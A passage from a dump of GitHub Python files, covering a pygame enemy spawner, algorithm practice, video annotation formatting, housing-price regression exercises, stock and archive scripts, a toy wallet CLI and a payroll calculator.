It changes direction when it collides with the screen edges.\n It dies when it is hit by one of the player's projectiles\n '''\n def __init__(self,path_stay,col_stay,rows_stay,flip_stay,path_walk,col_walk,rows_walk,flip_walk,x,y,gravity,speed,frame_rate_ms,move_rate_ms,lives,score):\n super().__init__(gravity, frame_rate_ms, move_rate_ms,score)\n \n \n self.stay_r = Auxiliar.getSurfaceFromSpriteSheet(path_stay,col_stay,rows_stay,flip_stay)\n self.stay_l = Auxiliar.getSurfaceFromSpriteSheet(path_stay,col_stay,rows_stay)\n self.walk_r = Auxiliar.getSurfaceFromSpriteSheet(path_walk,col_walk,rows_walk,flip_walk)\n self.walk_l = Auxiliar.getSurfaceFromSpriteSheet(path_walk,col_walk,rows_walk)\n \n self.contador_colisiones = 0\n self.salir_pantalla = False\n self.speed = speed\n self.vidas = lives\n self.score = score\n \n self.animation = self.stay_l\n self.direction = DIRECTION_R\n self.image = self.animation[self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n # character's collision rectangle\n self.collition_rect = pygame.Rect(x+(self.rect.width/2)-10,y,self.rect.width/2,30)\n # feet rectangle\n self.ground_collition_rect = pygame.Rect(self.collition_rect)\n self.ground_collition_rect.height = GROUND_COLLIDE_H\n self.ground_collition_rect.y = y + self.rect.height - GROUND_COLLIDE_H\n # head rectangle\n self.head_collition_rect = pygame.Rect(x+(self.rect.width/2)-10,y,self.rect.width/2,GROUND_COLLIDE_H)\n\n # flags\n self.eliminado = False\n #self.soltar_vida = False\n\n\n self.tiempo_transcurrido_animation = 0\n self.frame_rate_ms = frame_rate_ms \n self.tiempo_transcurrido_move = 0\n self.move_rate_ms = move_rate_ms\n\n def walk(self,borde_r,borde_l):\n if (self.is_fall == False):\n if self.direction == DIRECTION_R:\n self.move_x = +self.speed\n self.animation = self.walk_r\n self.move_x = self.speed\n else:\n self.move_x = -self.speed\n self.animation = self.walk_l\n self.move_x = -self.speed\n\n if not self.salir_pantalla:\n if(self.is_fall == False):\n if self.collition_rect.colliderect(borde_r):\n self.direction = DIRECTION_L\n self.contador_colisiones += 1\n elif self.collition_rect.colliderect(borde_l):\n self.direction = DIRECTION_R\n self.contador_colisiones += 1\n\n if self.contador_colisiones > 6:\n self.salir_pantalla = True\n if self.rect.x > 1200 or self.rect.x < -100:\n self.eliminado = True\n\n def update(self,delta_ms,plataform_list,bala,player,collition_r,collition_l):\n self.do_movement(delta_ms,plataform_list)\n self.do_animation(delta_ms)\n self.colision_bala(bala,delta_ms,player)\n self.colision_head(player)\n self.walk(collition_r,collition_l)\n self.herir_player(player,delta_ms)\n \n def draw(self,screen):\n self.image = self.animation[self.frame]\n screen.blit(self.image,self.rect)\n if(DEBUG):\n pygame.draw.rect(screen,color=(255,0 ,0),rect=self.collition_rect)\n pygame.draw.rect(screen,color=(255,255,0),rect=self.ground_collition_rect)\n pygame.draw.rect(screen,color=BLACK,rect=self.head_collition_rect)\n \n\n\n\n\n\n#--------------------------------------------------------------------------------------------------------------------------------\n\n\nclass Lista_walkers:\n def __init__(self,lista,metodo) -> None:\n self.metodo = metodo\n self.lista_general = lista\n self.lista_draw = [] # spawned enemies are stored in this list\n self.tiempo_spawn = 5000\n self.tiempo_transcurrido = 0\n self.primera = True\n self.bandera_primero = True\n\n '''\n def crear_enemigos(self):\n return [() for i in 
range(self.cantidad)] # generates the list with a single for comprehension\n \n \n def recargar_enemigos(self,jefe):\n #if jefe.lista_draw:\n if len(self.lista_draw) < self.cantidad:\n self.crear_enemigos()\n '''\n \n def enemigo_spawn(self,delta_ms):\n '''Takes enemies out of lista_general and appends them to lista_draw, based on a spawn-time parameter.'''\n if self.primera:\n enemigo_nacido = self.lista_general.pop(0)# pop the first element of the list and store it in enemigo_nacido\n self.lista_draw.append(enemigo_nacido)\n self.primera = False\n self.tiempo_transcurrido += delta_ms\n if self.tiempo_transcurrido >= self.tiempo_spawn and self.lista_general:\n enemigo_nacido = self.lista_general.pop(0)# pop the first element of the list and store it in enemigo_nacido\n enemigo_nacido.direction = random.choice([DIRECTION_L,DIRECTION_R])\n self.lista_draw.append(enemigo_nacido)\n self.tiempo_transcurrido = 0\n\n def encontrar_colision(self):\n '''Checks lista_draw; if an object's boolean attribute \"eliminado\" is True, removes that object from the list'''\n for enemigo in self.lista_draw:\n if enemigo.eliminado:\n self.lista_draw.remove(enemigo)\n\n def recargar(self):\n if not self.lista_general:# check whether the list is empty\n self.lista_general = self.metodo()\n\n def update(self,bala,delta_ms,plataform_list,player,border_r,borde_l,jefe):\n '''\n if self.bandera_primero:\n self.crear_enemigo_dos()\n self.bandera_primero = False\n '''\n self.enemigo_spawn(delta_ms)\n self.encontrar_colision()\n self.recargar()\n for enemigo in self.lista_draw:\n enemigo.update(delta_ms,plataform_list,bala,player,border_r,borde_l)\n \n def draw(self,screen):\n for enemigo in self.lista_draw:\n enemigo.draw(screen)\n\n\nclass Lista_jefe:\n def __init__(self,cantidad,tiempo_spawn,enemigo) -> None:\n self.cantidad = cantidad\n self.lista_general = self.crear_enemigos(enemigo)# not-yet-spawned enemies live in this list\n self.lista_draw = [] # spawned enemies are stored in this list\n self.tiempo_spawn = tiempo_spawn\n self.tiempo_transcurrido = 0\n self.primera = True\n self.bandera_primero = True\n\n \n def crear_enemigos(self,enemigo):\n return [enemigo() for i in range(self.cantidad)] # generates the list with a single for comprehension\n\n def enemigo_spawn(self,delta_ms):\n '''Takes enemies out of lista_general and appends them to lista_draw, based on a spawn-time parameter.'''\n \n if self.primera:\n enemigo_nacido = self.lista_general.pop(0)# pop the first element of the list and store it in enemigo_nacido\n self.lista_draw.append(enemigo_nacido)\n self.primera = False\n self.tiempo_transcurrido += delta_ms\n if self.tiempo_transcurrido >= self.tiempo_spawn and self.lista_general:\n enemigo_nacido = self.lista_general.pop(0)# pop the first element of the list and store it in enemigo_nacido\n self.lista_draw.append(enemigo_nacido)\n self.tiempo_transcurrido = 0\n\n def encontrar_colision(self):\n '''Checks lista_draw; if an object's boolean attribute \"eliminado\" is True, removes that object from the list'''\n for enemigo in self.lista_draw:\n if enemigo.eliminado:\n self.lista_draw.remove(enemigo)\n\n def update(self,bala,delta_ms,plataform_list,screen,player):\n self.enemigo_spawn(delta_ms)\n self.encontrar_colision()\n for enemigo in self.lista_draw:\n enemigo.update(delta_ms,plataform_list,bala,player)\n 
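# added note: unlike Lista_walkers, Lista_jefe draws inside update() rather than in a separate draw() method\n 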
enemigo.draw(screen)\n","repo_name":"BermudezNahuel/Python","sub_path":"Juego/manager_walkers.py","file_name":"manager_walkers.py","file_ext":"py","file_size_in_byte":8459,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
+{"seq_id":"38656694583","text":"from collections import deque\n\ndx = [0, 0, -1]\ndy = [1, -1, 0]\nfor tc in range(1,11):\n t = int(input()); n = 100\n ans = target_x = target_y = 0\n q=deque()\n graph = [list(map(int, input().split())) for _ in range(n)]\n visited = [[0] * 100 for _ in range(100)]\n # find the 2\n for i in range(100):\n if graph[n-1][i] == 2:\n target_x = n-1\n target_y = i\n visited[target_x][target_y]=1\n q.append([target_x, target_y])\n break\n\n while q:\n x, y = q.popleft()\n if x == 0:\n ans = y\n break\n for i in range(3):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < n and not visited[nx][ny] and graph[nx][ny] == 1:\n visited[nx][ny] = 1\n q.append([nx, ny])\n break\n print('#{} {}'.format(t, ans))","repo_name":"toki0411/Algorithm","sub_path":"SWEA/D4/1210. [S/W 문제해결 기본] 2일차 - Ladder1/[S/W 문제해결 기본] 2일차 - Ladder1.py","file_name":"[S/W 문제해결 기본] 2일차 - Ladder1.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"23889649147","text":"\r\nclass objects:\r\n\t\r\n\tlogger = -1\r\n\tobject_list = []\r\n\r\n\tdef __init__(self,logger,result):\r\n\t\tself.logger = logger.global_log\r\n\t\tself.process_objects(result)\r\n\t\t\r\n\tdef process_objects(self,result):\r\n\t\tself.logger.info('Formatting objects')\r\n\t\tfor i, obj in enumerate(result.annotation_results[0].object_annotations):\r\n\t\t\tif(len(obj.entity.description)>0):\r\n\t\t\t\tappearance_list = self.all_appearances(obj.segment.start_time_offset,obj.frames,obj.confidence)\r\n\t\t\t\tself.all_objects(obj.entity.description,appearance_list)\r\n\r\n\tdef all_appearances(self,initial_time,all_frames,confidence):\r\n\t\tappearance_list = []\r\n\t\tprevious_milliseconds = self.milliseconds(initial_time)\r\n\t\tfor current_frame in all_frames:\r\n\t\t\tcurrent_milliseconds = self.milliseconds(current_frame.time_offset)\r\n\t\t\tappearance_dict = self.one_appearance(current_frame.normalized_bounding_box,\r\n\t\t\t\tprevious_milliseconds,current_milliseconds,confidence)\r\n\t\t\tappearance_list.append(appearance_dict)\r\n\t\t\tprevious_milliseconds = current_milliseconds\r\n\t\treturn appearance_list\r\n\r\n\tdef milliseconds(self,time):\r\n\t\tmilliseconds = str(round((time.seconds + time.nanos/1e9)*1000,4))\r\n\t\treturn milliseconds\r\n\r\n\tdef one_appearance(self,box,previous_milliseconds,current_milliseconds,confidence):\r\n\t\tappearance_dict = {}\r\n\t\tappearance_dict[\"left\"] = round(box.left,4)\r\n\t\tappearance_dict[\"top\"] = round(box.top,4)\r\n\t\tappearance_dict[\"right\"] = round(box.right,4)\r\n\t\tappearance_dict[\"bottom\"] = round(box.bottom,4)\r\n\t\tappearance_dict[\"start\"] = previous_milliseconds\r\n\t\tappearance_dict[\"end\"] = current_milliseconds\r\n\t\tappearance_dict[\"confidence\"] = round(confidence,4)\r\n\t\treturn appearance_dict\t\t\r\n\r\n\tdef all_objects(self,object_name,appearance_list):\r\n\t\texist = self.check_existence(object_name)\r\n\t\tif exist:\r\n\t\t\tself.already_on_list(object_name,appearance_list)\r\n\t\telse:\r\n\t\t\tself.new_on_list(object_name,appearance_list)\r\n\r\n\tdef check_existence(self,name):\r\n\t\texist = False\r\n\t\tfor element in self.object_list: 
\r\n\t\t\tif(element['object']==name):\r\n\t\t\t\texist = True\r\n\t\t\t\tbreak;\t\r\n\t\treturn exist\r\n\r\n\tdef already_on_list(self,name,appearance_list):\r\n\t\tfor element in self.object_list: \r\n\t\t\tif(element['object']==name):\r\n\t\t\t\telement['appearances'] += appearance_list\r\n\t\t\t\tbreak;\r\n\r\n\tdef new_on_list(self,name,appearance_list):\r\n\t\tobject_dict = {}\r\n\t\tobject_dict[\"object\"] = name\r\n\t\tobject_dict[\"appearances\"] = appearance_list\r\n\t\tself.object_list.append(object_dict)\r\n\r\n\tdef get_json(self):\r\n\t\treturn self.object_list","repo_name":"marioquiroa/syn-sls-image-recognition","sub_path":"syn-gcp-objects/libraries/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71107365905","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 27 13:16:09 2015\n\n@author: nickbecker\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\n\ndtype_dict = {'bathrooms':float, 'waterfront':int, 'sqft_above':int, 'sqft_living15':float, 'grade':int, 'yr_renovated':int, 'price':float, 'bedrooms':float, 'zipcode':str, 'long':float, 'sqft_lot15':float, 'sqft_living':float, 'floors':str, 'condition':int, 'lat':float, 'date':str, 'sqft_basement':int, 'yr_built':int, 'id':str, 'sqft_lot':int, 'view':int}\nsales = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/kc_house_data.csv', dtype=dtype_dict)\nsales = sales.sort(['sqft_living','price'])\n\n\ndef polynomial_dataframe(feature, degree):\n # Returns a data frame of a Series raised to powers up to degree\n poly_dataframe = pd.DataFrame()\n poly_dataframe['power_1'] = feature\n\n if degree > 1:\n # loop over the remaining degrees:\n for power in range(2, degree+1):\n name = 'power_' + str(power)\n poly_dataframe[name] = poly_dataframe['power_1'].apply(lambda x: x**power)\n \n return poly_dataframe\n\n\npoly1_data = polynomial_dataframe(sales['sqft_living'], 1)\npoly1_data['price'] = sales['price']\n\n\n## Regression using Sci-kit learn\n\n# fit a degree-1 model\nmodel_1 = linear_model.LinearRegression()\nmodel_1.fit(poly1_data['power_1'].reshape((len(poly1_data), 1)),\n poly1_data['price'])\nmodel_1.coef_\nmodel_1.intercept_\npredictions_1 = model_1.predict(poly1_data['power_1'].reshape((len(poly1_data), 1)))\n\n# plot the data with the model's predicted values\nplt.plot(poly1_data['power_1'],poly1_data['price'], '.',\npoly1_data['power_1'], predictions_1, '-')\n\n\n# fit a degree-2 model\npoly2_data = polynomial_dataframe(sales['sqft_living'], 2)\npoly2_data['price'] = sales['price']\nfeatures = ['power_1', 'power_2']\n\nmodel_2 = linear_model.LinearRegression()\nmodel_2.fit(poly2_data[features],\n poly2_data['price'])\nmodel_2.coef_\nmodel_2.intercept_\npredictions_2 = model_2.predict(poly2_data[features])\n\n# plot the data with the model's predicted values\nplt.plot(poly2_data['power_1'],poly2_data['price'], '.',\npoly2_data['power_1'], predictions_2, '-')\n\n\n\n# fit a degree-15 model\npoly15_data = polynomial_dataframe(sales['sqft_living'], 15)\npoly15_data['price'] = sales['price']\nfeatures = poly15_data.columns[:-1]\n\nmodel_15 = linear_model.LinearRegression()\nmodel_15.fit(poly15_data[features],\n poly15_data['price'])\nmodel_15.coef_\nmodel_15.intercept_\npredictions_15 = model_15.predict(poly15_data[features])\n\n# plot the data with the model's predicted 
values\nplt.plot(poly15_data['power_1'],poly15_data['price'], '.',\npoly15_data['power_1'], predictions_15, '-')\n\n\n\n\n\n### Fitting 15th degree polynomimal on 4 datasets\nkc_house_set_1 = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_set_1_data.csv', dtype=dtype_dict)\nkc_house_set_2 = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_set_2_data.csv', dtype=dtype_dict)\nkc_house_set_3 = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_set_3_data.csv', dtype=dtype_dict)\nkc_house_set_4 = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_set_4_data.csv', dtype=dtype_dict)\n\n\n\n# Set 1\nset1_poly15_data = polynomial_dataframe(kc_house_set_1['sqft_living'], 15)\nset1_poly15_data['price'] = sales['price']\nfeatures = set1_poly15_data.columns[:-1]\n\nset1_model_15 = linear_model.LinearRegression()\nset1_model_15.fit(set1_poly15_data[features],\n set1_poly15_data['price'])\nset1_model_15.coef_\nset1_model_15.intercept_\nset1_predictions_15 = set1_model_15.predict(set1_poly15_data[features])\n\n# plot the data with the model's predicted values\nplt.plot(set1_poly15_data['power_1'],set1_poly15_data['price'], '.',\nset1_poly15_data['power_1'], set1_predictions_15, '-')\n\n\n\n\n# Set 2\nset2_poly15_data = polynomial_dataframe(kc_house_set_2['sqft_living'], 15)\nset2_poly15_data['price'] = kc_house_set_2['price']\nfeatures = set2_poly15_data.columns[:-1]\n\nset2_model_15 = linear_model.LinearRegression()\nset2_model_15.fit(set2_poly15_data[features],\n set2_poly15_data['price'])\nset2_model_15.coef_\nset2_model_15.intercept_\nset2_predictions_15 = set2_model_15.predict(set2_poly15_data[features])\n\n# plot the data with the model's predicted values\nplt.plot(set2_poly15_data['power_1'],set2_poly15_data['price'], '.',\nset2_poly15_data['power_1'], set2_predictions_15, '-')\n\n\n\n\n# Set 3\nset3_poly15_data = polynomial_dataframe(kc_house_set_3['sqft_living'], 15)\nset3_poly15_data['price'] = kc_house_set_3['price']\nfeatures = set3_poly15_data.columns[:-1]\n\nset3_model_15 = linear_model.LinearRegression()\nset3_model_15.fit(set3_poly15_data[features],\n set3_poly15_data['price'])\nset3_model_15.coef_\nset3_model_15.intercept_\nset3_predictions_15 = set3_model_15.predict(set3_poly15_data[features])\n\n# plot the data with the model's predicted values\nplt.plot(set3_poly15_data['power_1'],set3_poly15_data['price'], '.',\nset3_poly15_data['power_1'], set3_predictions_15, '-')\n\n\n\n# Set 4\nset4_poly15_data = polynomial_dataframe(kc_house_set_4['sqft_living'], 15)\nset4_poly15_data['price'] = kc_house_set_4['price']\nfeatures = set4_poly15_data.columns[:-1]\n\nset4_model_15 = linear_model.LinearRegression()\nset4_model_15.fit(set4_poly15_data[features],\n set4_poly15_data['price'])\nset4_model_15.coef_\nset4_model_15.intercept_\nset4_predictions_15 = set4_model_15.predict(set4_poly15_data[features])\n\n# plot the data with the model's predicted values\nplt.plot(set4_poly15_data['power_1'],set4_poly15_data['price'], '.',\nset4_poly15_data['power_1'], set4_predictions_15, '-')\n\n\n\n\n### \n\nkc_house_train = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_train_data.csv', dtype=dtype_dict)\nkc_house_validation = 
pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_valid_data.csv', dtype=dtype_dict)\nkc_house_test = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_test_data.csv', dtype=dtype_dict)\n\nbest_rss = 1e20 # initialize to a high value\nfor degree in range(1,16):\n poly_data_temp = polynomial_dataframe(kc_house_train['sqft_living'], degree)\n poly_data_temp['price'] = kc_house_train['price']\n \n features_temp = poly_data_temp.columns[:-1]\n \n model_temp = linear_model.LinearRegression()\n model_temp.fit(poly_data_temp[features_temp], poly_data_temp['price'])\n \n validation_temp = polynomial_dataframe(kc_house_validation['sqft_living'], degree)\n validation_temp['price'] = kc_house_validation['price']\n validation_predictions = model_temp.predict(validation_temp[features_temp])\n \n # compute validation RSS\n model_temp_ssr = sum((validation_predictions - validation_temp['price'])**2)\n \n if model_temp_ssr < best_rss:\n best_rss = model_temp_ssr \n best_model = \"Degree: \" + str(degree)\n \nprint(best_model)\n \n\n\n# degree 6 on test data\ntrain_6 = polynomial_dataframe(kc_house_train['sqft_living'], 6)\ntrain_6['price'] = kc_house_train['price']\nfeatures_6 = train_6.columns[:-1]\n\nmodel_6 = linear_model.LinearRegression()\nmodel_6.fit(train_6[features_6], train_6['price'])\n \ntest_6 = polynomial_dataframe(kc_house_test['sqft_living'], 6)\ntest_6['price'] = kc_house_test['price']\n\ntest_6_predictions = model_6.predict(test_6[features_6])\n \n# compute test 4 RSS\ntest_6_rss = sum((test_6_predictions - test_6['price'])**2)\nprint(test_6_rss)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"beckernick/machine_learning_prediction","sub_path":"housing_prices_prediction/model_tuning_algorithms.py","file_name":"model_tuning_algorithms.py","file_ext":"py","file_size_in_byte":7941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40312467526","text":"import datetime\n\nimport pandas as pd\nfrom pandas.compat import StringIO\n\nimport tushare as ts\n\nif __name__ == '__main__':\n now = datetime.datetime.now()\n today = str(now.date())\n\n sh = ts.get_hist_data('sh')\n filename = 'data/scan_big_bid/{}.csv'.format(sh.index[0] if sh.index[0] != today else sh.index[1])\n\n print(filename)\n text = open(filename, encoding='GBK').read()\n text = text.replace('--', '')\n df = pd.read_csv(StringIO(text), dtype={'code': 'object'})\n hist = df.set_index('code')\n # hist = hist.head(10)\n # hist = hist.tail(10)\n print(hist)\n\n all = ts.get_today_all()\n all_index = list(all['code'])\n filterd = pd.DataFrame()\n for i in range(len(hist)):\n index = all_index.index(hist.index[i])\n row = all.loc[index]\n if row['volume'] > 0:\n # print(row)\n row['url'] = hist['url'][i]\n row['prehigh'] = hist['high'][i]\n filterd = filterd.append(row)\n\n now = pd.DataFrame({'code': filterd['code']})\n now['name'] = filterd['name']\n now['prehigh'] = filterd['prehigh']\n now['settlement'] = filterd['settlement']\n now['open'] = filterd['open']\n now['openpercent'] = ((filterd['open'] - filterd['prehigh']) / filterd['prehigh'] * 100).round(3)\n now['changepercent'] = ((filterd['trade'] - filterd['prehigh']) / filterd['prehigh'] * 100).round(3)\n now['url'] = filterd['url']\n now = now.reset_index(drop=True)\n # now = now.sort_values('openpercent')\n now = 
now.sort_values('changepercent')\n\n open_positive = (now['openpercent'] > 0).sum() / len(now) * 100\n open_avg = now['openpercent'].mean()\n now_positive = (now['changepercent'] > 0).sum() / len(now) * 100\n now_avg = now['changepercent'].mean()\n\n print(now)\n print('open positive-return probability: {}%'.format(round(open_positive, 2)))\n print('open overall return: {}%'.format(round(open_avg, 2)))\n print('now positive-return probability: {}%'.format(round(now_positive, 2)))\n print('now overall return: {}%'.format(round(now_avg, 2)))\n","repo_name":"fswzb/analyze","sub_path":"watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"37813788545","text":"import re\nfrom time import sleep\nfrom datetime import datetime\n\nimport waybackpy\n\nUSER_AGENT = \"Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0\"\n\n# get the nearest archived version to following date parameters\nYEAR = 2021\nMONTH = 1\nDAY = 1\nOLD_DATE = datetime(2018, 6, 1) # if archived version older than this, update\n\ndef get_archived(page_url, update_old=False, year=YEAR):\n try:\n waybackpy_url_obj = waybackpy.Url(page_url, USER_AGENT)\n archive_url_near = waybackpy_url_obj.near(year=year, month=MONTH, day=DAY)\n except waybackpy.exceptions.WaybackError as e:\n try: # try again\n sleep(5)\n waybackpy_url_obj = waybackpy.Url(page_url, USER_AGENT)\n archive_url_near = waybackpy_url_obj.near(year=year, month=MONTH, day=DAY)\n except waybackpy.exceptions.WaybackError as e:\n # print(e)\n print(' error in retrieving {} , using original url '.format(page_url))\n return page_url\n url_str = archive_url_near.archive_url\n if update_old:\n date = archive_url_near.timestamp\n if date < OLD_DATE:\n print('updating {}'.format(url_str, date))\n archive_url_near = update_archive(waybackpy_url_obj)\n if archive_url_near is None:\n print(' could not save page {}'.format(page_url))\n else:\n url_str = archive_url_near.archive_url\n print(' updated to {}'.format(url_str))\n url_str = url_str.replace(':80', '', 1)\n return url_str\n\n\ndef update_archive(waybackpy_url_obj):\n if isinstance(waybackpy_url_obj, str):\n waybackpy_url_obj = waybackpy.Url(waybackpy_url_obj, USER_AGENT)\n try:\n archive_obj = waybackpy_url_obj.save()\n except waybackpy.exceptions.WaybackError as e:\n print(e)\n return None\n return archive_obj\n\n\ndef get_orig_url(url):\n matches = re.split('(https?://)', url)\n return ''.join(matches[-2:])\n\n\nif __name__ == \"__main__\":\n print(get_archived('https://www.sparknotes.com/lit/#'))\n","repo_name":"manestay/novel-chapter-dataset","sub_path":"scraping/archive_lib.py","file_name":"archive_lib.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"}
+{"seq_id":"39249815311","text":"from bs4 import BeautifulSoup\n\nfrom create_and_migrate_db import db, mxGraph_Cells_Table_Class,Cell_Id_And_Capacity_Table_Class\n\ndef Update_Database_Asynchronously_With_Latest_Map_XML_Backend(xml_data):\n\tsoup = BeautifulSoup(xml_data, 'xml')\n\tlist_of_all_cell_tags = soup.findAll('mxCell')\n\tlist_of_cell_types=[]\n\tlist_of_cell_ids=[]\n\tlist_of_cell_asset_type=[]\n\tlist_of_cell_source=[]\n\tlist_of_cell_target=[]\n\tfor cell_tag in list_of_all_cell_tags:\n\t\tif (cell_tag.get('vertex')) is not 
None:\r\n\t\t\t\texist = True\r\n\t\t\t\tbreak;\t\r\n\t\treturn exist\r\n\r\n\tdef already_on_list(self,name,appearance_list):\r\n\t\tfor element in self.object_list: \r\n\t\t\tif(element['object']==name):\r\n\t\t\t\telement['appearances'] += appearance_list\r\n\t\t\t\tbreak;\r\n\r\n\tdef new_on_list(self,name,appearance_list):\r\n\t\tobject_dict = {}\r\n\t\tobject_dict[\"object\"] = name\r\n\t\tobject_dict[\"appearances\"] = appearance_list\r\n\t\tself.object_list.append(object_dict)\r\n\r\n\tdef get_json(self):\r\n\t\treturn self.object_list","repo_name":"marioquiroa/syn-sls-image-recognition","sub_path":"syn-gcp-objects/libraries/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"40701845090","text":"import argparse\nimport main\nimport sys\nfrom main import TurtleWallet\n\ndef new_wallet(name):\n main.new_wallet(name)\n\ndef access_wallet(name):\n return main.access_wallet(name)\n\ndef list_wallets():\n main.list_wallets()\n\n# usage: python cli.py --wallet\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--wallet\", action=\"store_true\")\nparser.add_argument(\"--transact\", action=\"store_true\")\nparser.add_argument(\"--list_wallets\", action=\"store_true\") # added: args.list_wallets is checked below but the flag was never registered\nargs = parser.parse_args()\nif args.wallet:\n print(\"Enter wallet name:\")\n name = input()\n wallet = access_wallet(name)\n if not wallet:\n print(f\"A wallet with that name does not exist. 
Do you wish to create one?\")\n        while True:\n            print(\"type 'yes' or 'no':\")\n            create_new = input()\n            if create_new == 'yes':\n                print(f\"creating wallet with name {name}\")\n                new_wallet(name)\n                wallet = access_wallet(name)\n                break\n            elif create_new == 'no':\n                sys.exit()\n        print(\"wallet created\")\n    else:\n        print(\"wallet restored\")\n\n\n    #now do stuff with wallet?\n    #add address\n    # do you want to create a new address?\n    sys.exit() #until I fix / implement the next part\n\n    #wallet.list_addressses() # lists public addresses\n    print(\"Do you want to create a new address\")\n    while True:\n        print(\"type 'yes' or 'no':\")\n        new_address = input()\n        if new_address == 'yes':\n            # something about this one bugs me.\n            addr = wallet.generate_new_child_private_public_address()\nif args.list_wallets:\n    list_wallets()\nif args.transact:\n    print(\"creating transaction, you will enter your wallet name\")\n    print(\"Enter the name of your wallet:\")\n    wallet = input()\n    print(f\"Wallet name is {wallet}\")\n    print(\"Enter amount in Eth:\")\n    value = input()\n    print(f\"value is {value}\")\n    print(\"Enter destination address:\")\n    to_address = input()\n    print(f\"destination address is {to_address}\")\n\n    print(\"Verify the following information is correct: \")\n    print(\"value: \", value, \" destination: \", to_address)\n    print(\"Do you wish to proceed with the transaction? Type 'Yes' to proceed, 'No' to cancel\")\n    proceed = input()\n    if proceed == \"Yes\":\n\n        pass\n        # do transaction\n","repo_name":"bschwyn/Wallet","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37735399175","text":"\nimport enter as en\nimport logger\nimport view\n\n\ndef start():\n    button = view.choice()\n    if button == 1:\n        print('Enter the contact details')\n        contact = en.enter()\n        logger.log_to_file(contact)\n        start()\n    if button == 2:\n        print('Work is finished')\n        exit()","repo_name":"LenaLemesheva/Python","sub_path":"Семинары/Домашние задания/17.10.2022/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32277550509","text":"import os\nimport re\nimport sys\nfrom one.api import ONE\nfrom brainwidemap.decoding.settings import SLURM_DIR\n\none = ONE()\njob_name = sys.argv[1]\n\nfs = [f for f in os.listdir(SLURM_DIR) if re.match(job_name + \".*err\", f)]\nfs_out = [f for f in os.listdir(SLURM_DIR) if re.match(job_name + \".*out\", f)]\nprint(f'found {len(fs)} matching error files in SLURM_DIR')\nprint(f'found {len(fs_out)} matching output files in SLURM_DIR')\n\ncancel_files = []\nfor f in fs:\n    with open(SLURM_DIR.joinpath(f), \"r\") as fo:\n        s = fo.read().replace(\"\\n\", \"\")\n        if re.match(\".*CANCELLED.*\", s):\n            cancel_files.append(f)\n\nspikesort_fail_eids = []\ntrial_fail_eids = []\nfor f in fs_out:\n    with open(SLURM_DIR.joinpath(f), \"r\") as fo:\n        s = fo.read().replace(\"\\n\",\"\")\n        matches = re.finditer(\"Downloading failed for spike sorting data\", s)\n        for match in matches:\n            end_index = match.end()\n            spikesort_fail_eids.append(f'eid {one.pid2eid(s[end_index+6:end_index+42])[0]}')\n        matches = re.finditer(\"Downloading failed for trials data\", s)\n        for match in matches:\n            end_index = match.end()\n            trial_fail_eids.append(s[end_index+2:end_index+42])\n\nprint(\"Cancelled files:\")\nprint('\\n'.join(cancel_files))\nprint(\"Downloading failed for spike 
sorting:\")\nprint('\\n'.join(spikesort_fail_eids))\nprint(\"Downloading failed for trial data:\")\nprint('\\n'.join(trial_fail_eids))\n","repo_name":"int-brain-lab/paper-brain-wide-map","sub_path":"brainwidemap/decoding/00b_check_download.py","file_name":"00b_check_download.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"4440905963","text":"from command.base import BaseCommand\r\nfrom config import Config\r\nfrom context.paymentcalculator import EmployeePayroll\r\n\r\n\r\nclass CalculatePayrollCommand(BaseCommand):\r\n\r\n def __init__(self, context):\r\n self.context = context\r\n\r\n def execute(self):\r\n for employee_time_sheet in self.context.time_sheet_list:\r\n amount = self.calculate_amount(employee_time_sheet.time_sheet)\r\n self.context.payroll_list.append(\r\n EmployeePayroll(employee_time_sheet.name, amount)\r\n )\r\n\r\n def calculate_amount(self, 